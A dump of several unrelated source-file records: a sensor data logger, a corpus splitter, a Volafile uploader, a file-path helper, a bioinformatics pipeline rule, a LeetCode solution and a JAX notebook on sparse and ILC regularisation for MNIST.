tree = xml.etree.ElementTree.parse(os.path.join(CWD_PATH, 'conf/channel_config.xml'))
root = tree.getroot()
channels_dict = dict()
data_row = [None]
for type in root:
print(type.tag, '<-- child.tag | child.attrib --->', type.attrib)
if type.tag == 'DatalogFilenamePrefix':
FILENAME_PREFIX = type.attrib['prefix']
for ch in type.iter('ch'):
channels_dict[ch.attrib['col']] = ch.attrib
data_row.append(None)
print(type.attrib['type'], ' --> Analog input channels --> ', ch.attrib)
del root, tree, type, ch
# END OF CHANNELS CONFIG PARSER
#TODO write the csv writer for file container of data
file_name_suffix = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
file_name = FILENAME_PREFIX+file_name_suffix+'.csv'
csv_file_name = os.path.join(CWD_PATH,file_name)
csv_file_header= open(csv_file_name,mode='w', encoding='utf-8')
csv_file = csv.writer(csv_file_header, dialect='excel', delimiter=',', quotechar="'", quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
del file_name, file_name_suffix, FILENAME_PREFIX
# write the file table columns header
head_row = list(' '*(len(channels_dict)+1))
# add first column as timestamp in position 0 (zero)
head_row[0]='Timestamp(Unix) [s from 1.1.1970]'
for col, channel in channels_dict.items():
col_head = "{} [{}]".format(channel['name'],channel['um'])
head_row[int(col)]=col_head
csv_file.writerow(head_row)
del head_row, col_head
# MAIN LOOP OF DATA LOGGING
first_cycle = True
#check the staus of the Key input - if KEY_OFF jump to program exit
while key_status() == KEY_ON:
try:
#for cycle in range(cycles):
if first_cycle:
# Create new threads
thread2 = BlinkLoggingLed(2, "Blink-LogLed", 1)
logging_led_status = True
# Start new Threads
thread2.start()
t_old = datetime.datetime.now()
iet = datetime.timedelta(0)
et_mean=datetime.timedelta(0)
send_command(client_PL1012, 'K')
answ = ""
send_command(client_TC08, 'S')
answ_tc08 = ""
cycle = 1
first_cycle=False
else:
answ = client_PL1012.recv(24)
answ_tc08 = client_TC08.recv(256)
send_command(client_PEAK, 'S')
answPEAK = client_PEAK.recv(2048)
CAN_row_Data = []
CAN_row_Data_parser = csv.reader(answPEAK.decode().split('\n'), delimiter=',')
for value in CAN_row_Data_parser:
CAN_row_Data.append(value)
print('\t'.join(value))
temperatures_data = TC08DataFormat.parse(answ_tc08)
pl1012_data = PL1012DataFormat.parse(answ)
# for i in range(TC08FLOAT_N):
#
#
# for i in range(PL1012BYTE_N):
# print_xy(SCREEN_POS[i][0], SCREEN_POS[i][1] + 12, "{:06d}".format(data.data[i]))
# for i in range(PL1012BYTE_N, PL1012BYTE_N + TC08FLOAT_N):
# print_xy(SCREEN_POS[i][0], SCREEN_POS[i][1] + 12,
# "{:04.3f}".format(temperatures.data[i - PL1012BYTE_N]))
#
# start_time_data = PL1012BYTE_N + TC08FLOAT_N + 1
# # print_xy(SCREEN_POS[start_time_data][0], SCREEN_POS[start_time_data][1]+12, "{}".format(i))
# print_xy(SCREEN_POS[start_time_data + 1][0], SCREEN_POS[start_time_data + 1][1] + 12,
# "cycle {}/{}".format(cycle, cycles))
# print_xy(SCREEN_POS[start_time_data + 2][0], SCREEN_POS[start_time_data + 2][1] + 12,
# "Mean {:09.6f}".format(et_mean.total_seconds()))
# print_xy(SCREEN_POS[start_time_data + 3][0], SCREEN_POS[start_time_data + 3][1] + 12,
# "Min {:09.6f}".format(et_min.total_seconds()))
# print_xy(SCREEN_POS[start_time_data + 4][0], SCREEN_POS[start_time_data + 4][1] + 12,
# "Max {:09.6f}".format(et_max.total_seconds()))
# print_xy(SCREEN_POS[start_time_data + 5][0], SCREEN_POS[start_time_data + 5][1] + 12,
# "Lag corr {:09.6f}".format(lag_correction))
cycle +=1
t_now = datetime.datetime.now()
et = t_now -t_old
iet += et
et_mean= iet/cycle
#print("SENT {} on iteration {}: et_mean={}, et_max= {} et_min= {}".format(x, i, et_mean.total_seconds(),et_max.total_seconds(), et_min.total_seconds()))
t_old=t_now
lag_time = et.total_seconds()-bt
lag_correction += lag_time/10
sleep_time = bt - lag_correction
# print_xy(SCREEN_POS[start_time_data+6][0], SCREEN_POS[start_time_data+6][1]+12, "Sleep time{}".format(sleep_time))
send_command(client_PL1012,'K')
send_command(client_TC08,'S')
# Loop for data linearization according to channel_config.xml
for col, channel in channels_dict.items():
if channel['hw']=='tc08':
# TC08 return float value already linearized
data_row[int(col)] = temperatures_data.data[int(channel['ph'])]
elif channel['hw']=='pl1012':
data_row[int(col)] = linearise_signal(pl1012_data.data[int(channel['ph'])],channel)
elif channel['hw']=='pcan':
for msg in CAN_row_Data:
if len(msg) > 1:
msg_id = msg[0]
if channel['pgn'] in msg_id.upper():
data_len = int((float(channel['bits'])+7)/8)
data_row[int(col)] = linearise_signal(msg[int(channel['byte']):int(channel['byte'])+data_len],channel)
else:
data_row[int(col)] = None
# write the data row in csv file
# insert timestamp
data_row[0] = datetime.datetime.now(datetime.timezone.utc).timestamp()
csv_file.writerow(data_row)
if sleep_time < 0.0:
sleep_time = bt
time.sleep(sleep_time)
except KeyboardInterrupt as k:
print("\nClient Shutting down.\n")
client_PL1012.close()
client_TC08.close()
client_PEAK.close()
break
# send closing command and close all clients
print("\nClient Shutting down.\n")
logging_led_status = False
time.sleep(2)
# Create new threads
thread1 = BlinkPowerLed(1, "Thread-1", 1)
# Start new Threads
thread1.start()
print ("Exiting Main Thread")
send_command(client_PL1012, 'X')
client_PL1012.close()
send_command(client_TC08, 'X')
client_TC08.close()
send_command(client_PEAK, 'X')
client_PEAK.close()
GPIO.cleanup()
csv_file_header.close()
power_latch = False
thread1.join()
time.sleep(5)
set_power_latch(GPIO.LOW)
sys.exit(0)
|
997,768 | acd1df17e2b0964f54e8701640dce4bf02c227b8 | import sys
import os
import argparse
argparser = argparse.ArgumentParser('''
Builds Brent dataset into appropriate format for use with DNN-Seg.
''')
argparser.add_argument('dir_path', help='Path to Brent source directory')
argparser.add_argument('-o', '--outdir', default='../dnnseg_data/brent/', help='')
args = argparser.parse_args()
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
if not os.path.exists(args.outdir + '/train'):
os.makedirs(args.outdir + '/train')
if not os.path.exists(args.outdir + '/test'):
os.makedirs(args.outdir + '/test')
with open(args.dir_path + '/br-phono.txt', 'r') as f:
with open(args.outdir + '/train/br-phono.txt', 'w') as train:
with open(args.outdir + '/test/br-phono.txt', 'w') as test:
for i, l in enumerate(f.readlines()):
if l.strip():
if i < 8000:
train.write(l)
else:
test.write(l) |
997,769 | 99aabb664017dc2b3e78571d5c7213b80df50307 | from volapi import Room
import argparse
import config
import os
import requests
def upload_process(room, passwd, user, userpasswd, files):
if len(files) == 0:
print("[X] No files were recognised! - Aborting upload")
return False
if room == "":
print(f"[X] You must provide a room! - Aborting upload!")
return False
if user == "" and config.VOLAFILE_USER == "":
local_user = "volapi"
upw_set = False
elif user == "" and config.VOLAFILE_USER != "":
local_user = config.VOLAFILE_USER
if config.VOLAFILE_USER_PASSWORD != "":
local_password = config.VOLAFILE_USER_PASSWORD
upw_set = True
else:
upw_set = False
else:
local_user = user
if userpasswd != "":
local_password = userpasswd
upw_set = True
else:
upw_set = False
if passwd == "":
rpw_set = False
else:
rpw_set = True
try:
if rpw_set and passwd[0:4] == "#key":
local_room = Room(name=room, key=passwd[4:], user=local_user)
elif rpw_set:
local_room = Room(name=room, password=passwd, user=local_user)
else:
local_room = Room(name=room, user=local_user)
except RuntimeError:
print(
f"[X] Could not connect to the specified room: {room} - Aborting upload.")
return False
if upw_set:
try:
local_room.user.login(local_password)
except RuntimeError:
print(
f"[X] Could not login user: {local_user} with the provided password - Aborting upload."
)
return False
filenum = 0
for f in files:
if os.path.isfile(f):
filenum += 1
handle_file(f, local_room, filenum)
elif os.path.isdir(f):
for filename in os.listdir(f):
if os.path.isfile(os.path.join(f, filename)):
filenum += 1
handle_file(os.path.join(f, filename), local_room, filenum)
else:
print(
f"[X] Subfolders are not handled, please specify seperately: {f} - Continue to next specified file"
)
else:
print(
f"[X] File/Folder could not be recognised: {f} - Continue to next specified file/folder"
)
continue
local_room.close()
def handle_file(file, room, filenum):
callback = CallbackInfo(file.split("/")[-1], filenum, room)
try:
file_id = room.upload_file(file, callback=callback, allow_timeout=True)
except ValueError:
print(
f"[{filenum}] Uploading to {room.name} | ERROR: File was too big to upload!",
end="\r",
)
except requests.exceptions.ConnectionError:
print(
f"[{filenum}] Uploading to {room.name} | ERROR: Connection timed out!",
end="\r",
)
except ConnectionError:
print(
f"[{filenum}] Uploading to {room.name} | ERROR: Connection timed out!",
end="\r",
)
if file_id:
print("")
print(
f"[{filenum}] {file.split('/')[-1]} uploaded to https://volafile.org/get/{file_id}/"
)
else:
print("")
class CallbackInfo:
def __init__(self, name, num, room):
self.name = name
self.num = num
self.room = room.name
def __call__(self, current, total):
print(
f"[{self.num}] Uploading to {self.room} | {self.name} -> {current / (1024 * 1024.0):.2f}MB/{total / (1024 * 1024.0):.2f}MB -> {float(current) / total:.2%} completed!",
end="\r",
)
def parse_args():
"""Parses user arguments"""
parser = argparse.ArgumentParser(description="volafile uploader")
parser.add_argument(
"--room",
"-r",
dest="room",
type=str,
required=True,
help="Room name, as in https://volafile.org/r/ROOMNAME",
)
parser.add_argument(
"--passwd",
"-p",
dest="passwd",
type=str,
default="",
help="Room password to enter the room",
)
parser.add_argument(
"--user",
"-u",
dest="user",
type=str,
default="",
help="Overwrite for VOLAFILE_USER in config.py",
)
parser.add_argument(
"--userpasswd",
"-up",
dest="userpasswd",
type=str,
default="",
help="Overwrite for VOLAFILE_USER_PASSWORD in config.py",
)
parser.add_argument(
"-f",
"--files",
metavar="FILE",
type=str,
nargs="+",
help="Files/folders to upload",
)
return parser.parse_args()
def main():
"""Main method"""
args = parse_args()
upload_process(args.room, args.passwd, args.user,
args.userpasswd, args.files)
if __name__ == "__main__":
main()
|
997,770 | 6632e5c001ef557b19e1e5585ef78101f707c531 | import builtins
import difflib
import inspect
import os
# Hack that modifies the built-in `open` function in such a way that
# an assignment can be done even at other places than the server.
def find_filename(filename):
if os.path.exists(filename):
return filename
path = os.path.dirname(inspect.getfile(inspect.currentframe()))
path = os.path.join(path, os.path.basename(filename))
if os.path.exists(path):
return path
return filename
old_open = builtins.open
def new_open(filename, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None):
return old_open(find_filename(filename), mode, buffering, encoding, errors, newline, closefd, opener)
builtins.open = new_open
# Lab code proper
def _diff(gold_tokens, pred_tokens):
"""Iterator over pairs describing longest differing subsequences
within `gold_tokens` and `pred_tokens`.
"""
matcher = difflib.SequenceMatcher(None, gold_tokens, pred_tokens)
a_lo = b_lo = 0
for a_hi, b_hi, n in matcher.get_matching_blocks():
if a_lo < a_hi or b_lo < b_hi:
yield gold_tokens[a_lo:a_hi], pred_tokens[b_lo:b_hi]
a_lo = a_hi + n
b_lo = b_hi + n
def diff(gold_tokens, pred_tokens):
"""Return a list of pairs describing longest differing subsequences
within `gold_tokens` and `pred_tokens`.
"""
return list(_diff(gold_tokens, pred_tokens))
def _n_matches(gold_tokens, pred_tokens):
"""Return the number of elements that match within `gold_tokens` and
`pred_tokens`.
"""
matcher = difflib.SequenceMatcher(None, gold_tokens, pred_tokens)
return sum(match.size for match in matcher.get_matching_blocks())
def n_errors(gold_tokens, pred_tokens):
"""Return the number of errors in the tokenization given by
`pred_tokens`, relative to the gold-standard tokenization given by
`gold_tokens`.
"""
return len(gold_tokens) + len(pred_tokens) - 2 * _n_matches(gold_tokens, pred_tokens)
def precision(gold_tokens, pred_tokens):
"""Return the precision of the tokenization given by `pred_tokens`,
relative to the gold-standard tokenization given by `gold_tokens`.
"""
n_pred_tokens = len(pred_tokens)
n_matches = _n_matches(gold_tokens, pred_tokens)
return n_matches / n_pred_tokens if n_pred_tokens > 0 else float('NaN')
def recall(gold_tokens, pred_tokens):
"""Return the recall of the tokenization given by `pred_tokens`,
relative to the gold-standard tokenization given by `gold_tokens`.
"""
n_gold_tokens = len(gold_tokens)
n_matches = _n_matches(gold_tokens, pred_tokens)
return n_matches / n_gold_tokens if n_gold_tokens > 0 else float('NaN')
|
997,771 | cd08d727c9ca3cbed23a15773da5c18b04a3d9b4 | rule abundance:
input:
assembly=RESULTS + "/assemblies/{sample}_trinity.Trinity.fasta",
fwd=RESULTS + "/fastq_trimmed/{sample}.1.trimmed.fastq",
rev=RESULTS + "/fastq_trimmed/{sample}.2.trimmed.fastq",
map=RESULTS + "/assemblies/{sample}_trinity.Trinity.fasta.gene_trans_map"
output:
check=RESULTS + "/quantification/{sample}.ok",
#salmon_dir=directory(RESULTS + "/quantification/{sample}"),
quant=RESULTS + "/quantification/{sample}/quant.sf"
log:
RESULTS + "/logs/quant/{sample}.quant.log"
params:
method="--est_method salmon",
type="--seqType fq",
prep="--prep_reference",
#options="--validateMappings",
outdir=RESULTS + "/quantification/{sample}"
shell:
"/home/progs/trinityrnaseq-v2.11.0/util/align_and_estimate_abundance.pl "
"--transcripts {input.assembly} {params.type} --left {input.fwd} --right {input.rev} "
"{params.method} --gene_trans_map {input.map} {params.prep} "
"--output {params.outdir} 2> {log} && touch {output.check}"
|
997,772 | a33ab7900b04782b3b1f27487d55fe25475d4d24 | #Favorite Genres
#https://leetcode.com/discuss/interview-question/373006
def initialize():
userSongs = {
"David": ["song1", "song2", "song3", "song4", "song8"],
"Emma": ["song5", "song6", "song7"]
}
songGenres = {
"Rock": ["song1", "song3"],
"Dubstep": ["song7"],
"Techno": ["song2", "song4"],
"Pop": ["song5", "song6"],
"Jazz": ["song8", "song9"]
}
return userSongs, songGenres
def favGenres(userSongs, songGenres):
genreSong = {}
for genre in songGenres:
for song in songGenres[genre]:
genreSong[song] = genre
userGenres = {}
for user in userSongs:
genres_count = {}
max = 0
for song in userSongs[user]:
genre = genreSong[song]
if genre in genres_count:
genres_count[genre] += 1
else:
genres_count[genre] = 1
if genres_count[genre] > max:
max = genres_count[genre]
userGenres[user] = [gen for gen,count in genres_count.items() if count == max]
return userGenres
if __name__ == '__main__':
userSongs, songGenres = initialize()
print(favGenres(userSongs, songGenres))
|
997,773 | 2dd5860d86f9c086e99b686075f347599a0a2c25 | # -*- coding: utf-8 -*-
"""SparseRegElasticNetILC
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/17Mq9jU51uZgUpvuSK3NuXbY8oxq6H_y-
# Copmparing Sparse Regularization with Elastic Net with ILC Regularization
### Installations and imports
"""
!pip install -q git+git://github.com/deepmind/optax.git
!pip install -q git+https://github.com/deepmind/dm-haiku
from typing import Any, Generator, Mapping, Tuple
from absl import app
import haiku as hk
import jax
import jax.numpy as jnp
import numpy as np
import optax
import tensorflow as tf
import tensorflow_datasets as tfds
from optax._src import transform
from jax import jit, grad, vmap
from jax.tree_util import tree_structure
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from matplotlib.pyplot import figure
"""### AND-mask optax class definition"""
class ANDMaskState(optax.OptState):
"""Stateless.""" # Following optax code style
def and_mask(agreement_threshold: float) -> optax.GradientTransformation:
def init_fn(_):
# Required by optax
return ANDMaskState()
def update_fn(updates, opt_state, params=None):
def and_mask(update):
# Compute the masked gradients for a single parameter tensor
mask = jnp.abs(jnp.mean(jnp.sign(update), 0)) >= agreement_threshold
mask = mask.astype(jnp.float32)
avg_update = jnp.mean(update, 0)
mask_t = mask.sum() / mask.size
update = mask * avg_update * (1. / (1e-10 + mask_t))
return update
del params # Following optax code style
# Compute the masked gradients over all parameters
# jax.tree_map maps a function (lambda function in this case) over a pytree to produce a new pytree.
updates = jax.tree_map(lambda x: and_mask(x), updates)
return updates, opt_state
return transform.GradientTransformation(init_fn, update_fn)
"""
### Sparse Logistic Regression Function (For reusability)
"""
OptState = Any
Batch = Mapping[str, np.ndarray]
def sparse_logistic_regression(train=None, test=None, adam_lr=1e-3, agreement_threshold=0.0,
use_ilc=False, l1_coef=1e-5, l2_coef=1e-4,
epochs=10001, Verbose=False, n_classes=10, normalizer=255., training=True):
training_accs = []
testing_accs = []
def net_fn(batch) -> jnp.ndarray:
x = jnp.array(batch, jnp.float32) / normalizer
mlp = hk.Sequential([
hk.Flatten(),
hk.Linear(n_classes),
])
return mlp(x)
# Make the network and optimiser.
net = hk.without_apply_rng(hk.transform(net_fn))
# Training loss (cross-entropy).
def loss(params: hk.Params, batch, label) -> jnp.ndarray:
"""Compute the loss of the network, including L2."""
logits = net.apply(params, batch)
labels = jax.nn.one_hot(label, n_classes)
# Cross Entropy Loss
softmax_xent = -jnp.sum(labels * jax.nn.log_softmax(logits))
softmax_xent /= labels.shape[0]
return softmax_xent
# Regularization loss (L1,L2).
def regularization_loss(params: hk.Params) -> jnp.ndarray:
"""Compute the regularization loss of the network, applied after ILC."""
# L1 Loss
sum_in_layer = lambda p: jnp.sum(jnp.abs(p))
sum_p_layers = [sum_in_layer(p) for p in jax.tree_leaves(params)]
l1_loss = sum(sum_p_layers)
# L2 Loss
l2_loss = 0.5 * sum(jnp.sum(jnp.square(p)) for p in jax.tree_leaves(params))
return l2_coef * l2_loss + l1_coef * l1_loss
@jax.jit
def gradient_per_sample(params, batch, label):
batch, label = jnp.expand_dims(batch,1), jnp.expand_dims(label,1)
return vmap(grad(loss), in_axes=(None, 0, 0))(params, batch, label)
gradient = jax.jit(grad(loss))
gradient_reg = jax.jit(grad(regularization_loss))
# Evaluation metric (classification accuracy).
@jax.jit
def accuracy(params: hk.Params, batch, label) -> jnp.ndarray:
predictions = net.apply(params, batch)
return jnp.mean(jnp.argmax(predictions, axis=-1) == label)
@jax.jit
def update(
params: hk.Params,
opt_state: OptState,
batch, label, agreement
) -> Tuple[hk.Params, OptState]:
"""Learning rule (stochastic gradient descent)."""
# grads = jax.grad(loss)(params, batch, label)
# grads_masked = (gradient_per_sample if use_ilc else gradient)(params, batch, label) # (gradient_per_sample)(params, batch, label)
# sum_grad_masked_regularized = jax.tree_multimap(lambda x,y:x+y,grads_masked,gradient_reg(params))
# grads = sum_grad_masked_regularized
# updates, opt_state = opt.update(grads, opt_state)
# new_params = optax.apply_updates(params, updates)
grads_samples = gradient_per_sample(params, batch, label)
ANDmask = and_mask(agreement)
masked_grads,_ = ANDmask.update(grads_samples, opt_state)
reg_grads = gradient_reg(params)
sum_grad_masked_regularized = jax.tree_multimap(lambda x,y:x+y,masked_grads,reg_grads)
updates,_ = opt.update(sum_grad_masked_regularized, opt_state)
new_params = optax.apply_updates(params, updates)
return new_params, opt_state
# We maintain avg_params, the exponential moving average of the "live" params.
# avg_params is used only for evaluation.
# For more, see: https://doi.org/10.1137/0330046
@jax.jit
def ema_update(
avg_params: hk.Params,
new_params: hk.Params,
epsilon: float = 0.001,
) -> hk.Params:
return jax.tree_multimap(lambda p1, p2: (1 - epsilon) * p1 + epsilon * p2,
avg_params, new_params)
if training is False:
return net, accuracy
else:
if use_ilc:
use_ilc = False
opt = optax.chain(optax.adam(adam_lr)
# ,optax.scale_by_adam()
)
# Initialize network and optimiser; note we draw an input to get shapes.
params = avg_params = net.init(jax.random.PRNGKey(42), next(train)['image'])
opt_state = opt.init(params)
# opt = optax.chain(and_mask(agreement_threshold) if use_ilc else optax.identity(),optax.adam(adam_lr))
# schedule_fn = optax.exponential_decay(adam_lr, # Note the minus sign!
# 1,
# 0.9)
# opt = optax.chain(optax.sgd(adam_lr), optax.scale_by_schedule(schedule_fn)) # Or Adam could be used
# Train/eval loop. WITHOUT ILC
print("Begin training with ILC")
for step in range(np.int(.5*epochs)):
if step % np.int(epochs/10) == 0:
# Periodically evaluate classification accuracy on train & test sets.
Batch = next(train)
train_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
train_accuracy = jax.device_get(train_accuracy)
Batch = next(test)
test_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
test_accuracy = jax.device_get(test_accuracy)
training_accs.append(train_accuracy)
testing_accs.append(test_accuracy)
if Verbose:
print(f"[ILC Off, Step {step}] Train accuracy/Test accuracy: "
f"{train_accuracy:.3f} / {test_accuracy:.3f}.")
# Do SGD on a batch of training examples.
Batch = next(train)
params, opt_state = update(params, opt_state, Batch['image'], Batch['label'], 0.)
avg_params = ema_update(avg_params, params)
use_ilc = True
# Train/eval loop. WITH ILC
for step in range(np.int(.5*epochs)):
if step % np.int(epochs/10) == 0:
# Periodically evaluate classification accuracy on train & test sets.
Batch = next(train)
train_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
train_accuracy = jax.device_get(train_accuracy)
Batch = next(test)
test_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
test_accuracy = jax.device_get(test_accuracy)
training_accs.append(train_accuracy)
testing_accs.append(test_accuracy)
if Verbose:
print(f"[ILC On, Step {step}] Train accuracy/Test accuracy: "
f"{train_accuracy:.3f} / {test_accuracy:.3f}.")
# Do SGD on a batch of training examples.
Batch = next(train)
params, opt_state = update(params, opt_state, Batch['image'], Batch['label'], agreement_threshold)
avg_params = ema_update(avg_params, params)
return params, training_accs, testing_accs
else:
# schedule_fn = optax.exponential_decay(adam_lr, # Note the minus sign!
# 1,
# 0.9)
# opt = optax.chain(optax.sgd(adam_lr), optax.scale_by_schedule(schedule_fn)) # Or Adam could be used
opt = optax.chain(optax.adam(adam_lr))
# Initialize network and optimiser; note we draw an input to get shapes.
params = avg_params = net.init(jax.random.PRNGKey(42), next(train)[0])
opt_state = opt.init(params)
use_ilc=False
# Train/eval loop.
print("Begin training without ILC")
for step in range(np.int(epochs)):
if step % np.int(epochs/10) == 0:
# Periodically evaluate classification accuracy on train & test sets.
Batch = next(train)
train_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
train_accuracy = jax.device_get(train_accuracy)
Batch = next(test)
test_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
test_accuracy = jax.device_get(test_accuracy)
training_accs.append(train_accuracy)
testing_accs.append(test_accuracy)
if Verbose:
print(f"[ADAM, Step {step}] Train accuracy/Test accuracy: "
f"{train_accuracy:.3f} / {test_accuracy:.3f}.")
# Do SGD on a batch of training examples.
Batch = next(train)
params, opt_state = update(params, opt_state, Batch['image'], Batch['label'], 0.)
avg_params = ema_update(avg_params, params)
return params, training_accs, testing_accs
"""### Storing the resulting weights for various hyperparameters, for plotting and exploratory purposes. Change the name when you store a parameter accordingly."""
import pickle
root_dir = '/content/drive/MyDrive/Mila Fall 2020/Probabilistic Graphical Models/Project/Data/'
def storeData(object, file_name, root_dir):
with open(root_dir+file_name, 'wb') as f:
pickle.dump(object, f)
f.close()
def loadData(file_name, root_dir):
with open(root_dir+file_name, 'rb') as f:
db = pickle.load(f)
f.close()
return db
# storeData(envs_elastic_net_params, 'envs_elastic_net_params', root_dir)
# storeData(envs_ilc_params, 'envs_ilc_params_l24_agth_09_late_turn_on_ilc_before_reg', root_dir)
# envs_elastic_net_params = loadData('envs_elastic_net_params_l14_l25', root_dir)
# envs_ilc_params = loadData('envs_ilc_params_l24_agth_03', root_dir)
# storeData(setting_overlaps, 'setting_overlaps', root_dir)
# setting_overlaps = loadData('setting_overlaps', root_dir)
# all_hps = loadData('all_hps', root_dir)
# model, accuracy_fn = sparse_logistic_regression(training=False)
"""### MAIN CELL: Experimenting a range of hyperparameters"""
# at = [0.2, 0.9]
# ll1 = [1e-3]
# ll2 = [1e-3, 1e-4]
# all = []
at = [0.0, 0.2, 0.4, 0.5, 0.7, 0.9]
ll1 = [1e-1, 1e-2, 1e-3]
ll2 = [1e-3, 1e-4, 1e-5]
all = []
n_envs = 2
ds_train_envs = []
batch_size = 10000
splits = tfds.even_splits('train', n=n_envs)
for m in range(n_envs):
ds = tfds.load("mnist:3.*.*", split=splits[m]).cache().repeat()
ds = ds.shuffle(10 * batch_size, seed=0)
ds = ds.batch(batch_size)
ds_train_envs.append(iter(tfds.as_numpy(ds)))
test_ds = tfds.load("mnist:3.*.*", split='test').cache().repeat()
test_ds = test_ds.shuffle(10 * 10000, seed=0)
test_ds = test_ds.batch(10000)
test_ds= iter(tfds.as_numpy(test_ds))
round = 0
for idx, thresh in enumerate(at):
for l1 in ll1:
for l2 in ll2:
round += 1
print('Round: ', round)
envs_elastic_net_params = []
hp = {}
hp['thresh'] = thresh
hp['l1'] = l1
hp['l2'] = l2
hp['params'] = []
hp['training_accuracies'] = []
hp['testing_accuracies'] = []
for m in range(n_envs):
print('Parameters=[l1={}, l2={}, agreement={}], Environment={}'.format(l1,l2,thresh, m))
params, train_accs, test_accs = sparse_logistic_regression(ds_train_envs[m], test_ds, adam_lr=1e-3, agreement_threshold=thresh,
use_ilc=True, l1_coef=l1, l2_coef=l2,
epochs=10001, Verbose=True)
envs_elastic_net_params.append(params)
hp['params'].append(params)
hp['training_accuracies'].append(train_accs)
hp['testing_accuracies'].append(test_accs)
all.append(hp)
# ############################## Run up to here ############################## #
# all = all_hps
n_envs = 2
setting_overlaps_method1 = np.zeros([len(all),10])
setting_overlaps_method2 = np.zeros([len(all),10])
num=0
for r in all:
num += 1
envs_elastic_net_params = r['params']
fig, axes = plt.subplots(len(envs_elastic_net_params), 10, figsize=(16, 4), dpi=130, facecolor='w', edgecolor='k')
# use global min / max to ensure all weights are shown on the same scale
for m in range(n_envs):
vmin, vmax = envs_elastic_net_params[m]['linear']['w'].min(), envs_elastic_net_params[m]['linear']['w'].max()
for coef, ax in zip(envs_elastic_net_params[m]['linear']['w'].T, axes[m,:]):
# print(coef.reshape(28, 28)[0,0])
ax.matshow(coef.reshape(28, 28), cmap=plt.cm.gray, vmin=.5 * vmin,
vmax=.5 * vmax)
ax.set_xticks(())
ax.set_yticks(())
'''
1st method for calculating overlaps: map zeros to 0s, nonzeros to 1s. Get and the mappings. Sum over axis 1 and normalize: by total pixels or max # of nonzero elements.
'''
c = [np.abs(envs_elastic_net_params[i]['linear']['w'].T.round(3)) > 0.0 for i in range(n_envs)]
c = np.array(c)
overlapping_selectors = np.logical_and(c[0],c[1])
denom = np.max(np.vstack((c[0].sum(axis=1),c[1].sum(axis=1))).T, axis=1)
caps = overlapping_selectors.sum(axis=1)/denom # or /28**2
caps[~np.isfinite(caps)] = 0
caps_method1 = caps.round(3) * 100
setting_overlaps_method1[num-1] = caps_method1
'''
2nd method for calculating overlaps: get a boolean mask for equal elements, get a boolean mask for nonzeros elements. And the masks.
Sum over axis 1 and normalize: by total pixels or max # of nonzero elements.
'''
c = [envs_elastic_net_params[i]['linear']['w'].T.round(3) for i in range(n_envs)]
c = np.array(c)
equal_mask = (c[0] == c[1])
nonzero_mask = (c[0] != 0)
overlapping_selectors = np.logical_and(equal_mask,nonzero_mask)
denom = np.max(np.vstack((np.count_nonzero(c[0],axis=1), np.count_nonzero(c[1],axis=1))).T,axis=1)
caps = overlapping_selectors.sum(axis=1)/denom # or /28**2
caps[~np.isfinite(caps)] = 0
caps_method2 = caps.round(3) * 100
setting_overlaps_method2[num-1] = caps_method2
caps_method1[~np.isfinite(caps_method1)] = 0
caps_method1 = caps_method1.round(3)
caps_method2[~np.isfinite(caps_method2)] = 0
caps_method2 = caps_method2.round(3)
caps = ['m1: '+str(c1) +', m2: '+str(c2) for c1,c2 in zip(caps_method1,caps_method2)]
# rows = np.array(r['acc']).round(3)
# rows = ['in: '+str(c1) +', out: '+str(c2) for c1,c2 in zip(np.array(r['acc']).round(3),np.array(r['test_accuracy']).round(3))]
rows = np.array(r['test_accuracy']).round(3)
for ax, col in zip(axes[0], caps):
ax.set_title(col,{'fontsize': 8})
for ax, row in zip(axes[:,0], rows):
ax.set_ylabel(row)
one = r['thresh']
two = r['l1']
three = r['l2']
plt.suptitle('ILC Regularization, Agreement Threshold={}, l1 coefficient={}, l2 coefficient={}'.format(one,two,three))
plt.savefig(f'{num}.png')
plt.show()
"""### Plots for the whole run"""
# NOTE: "all_hps", and "setting_overlaps" should be loaded from your local drive
# (I uploaded them along with the zip file)
import pickle
root_dir = '/'
def storeData(object, file_name, root_dir):
with open(root_dir+file_name, 'wb') as f:
pickle.dump(object, f)
f.close()
def loadData(file_name, root_dir):
with open(root_dir+file_name, 'rb') as f:
db = pickle.load(f)
f.close()
return db
# storeData(setting_overlaps, 'setting_overlaps', root_dir)
setting_overlaps = loadData('setting_overlaps', root_dir)
all_hps = loadData('all_hps', root_dir)
# There are 54 settings for hps, for each we need to extract the thresh and l1
# for fixed vals of l2. This function does that.
def idx_extrct(env_idx):
agreement = all_hps[env_idx]['thresh']
l1_coef = all_hps[env_idx]['l1']
return agreement, l1_coef
print(setting_overlaps.shape)
"""
coordinate_1 is a list of dictionaries, each dictionary corresponds to a digit
so coordinate_1 is a list of 10 dictionaries. Each dictionary holds these keys:
'digit', 'x', 'y', 'z'. 'digit' is obvious. 'x','y','z' hold the values for 3d
plots, so 'x' holds 18 values for agreement thresholds, 'y' 18 vals for log of
l1 coefs, 'z' 18 vals for overlap scores. Why 18? Remember that our hps are these:
at = [0.0, 0.2, 0.4, 0.5, 0.7, 0.9]
ll1 = [1e-1, 1e-2, 1e-3]
ll2 = [1e-3, 1e-4, 1e-5]
so 6 possible vals for at, 3 for l1, 3 for l2. In total there are 6x3x3=54 configs.
But when l2 is fixed (3D plots are for fixed l2), there remain 6x3=18 combination
of values for agreement and thresh. That's why 'x','y','z' have 18 elements for
each digit in coordinate_1. Now coordinate_1 holds the dicts for l2=0.001. The same
goes for coordinates_2 and coordinates_3. They hold the the coordinates for digits
in settings where l2=1e-4 and l2=1e-5, respectively.
"""
# There are 54 envs.
# threshold
coordinates_1 = []
coordinates_2 = []
coordinates_3 = []
for digit in range(10):
x_1 = []
y_1 = []
z_1 = []
x_2 = []
y_2 = []
z_2 = []
x_3 = []
y_3 = []
z_3 = []
for counter, hp in enumerate(all_hps):
# l2 coef = 0.001
if np.mod(counter,3) == 0:
thresh, l1 = idx_extrct(counter)
x_1.append(thresh)
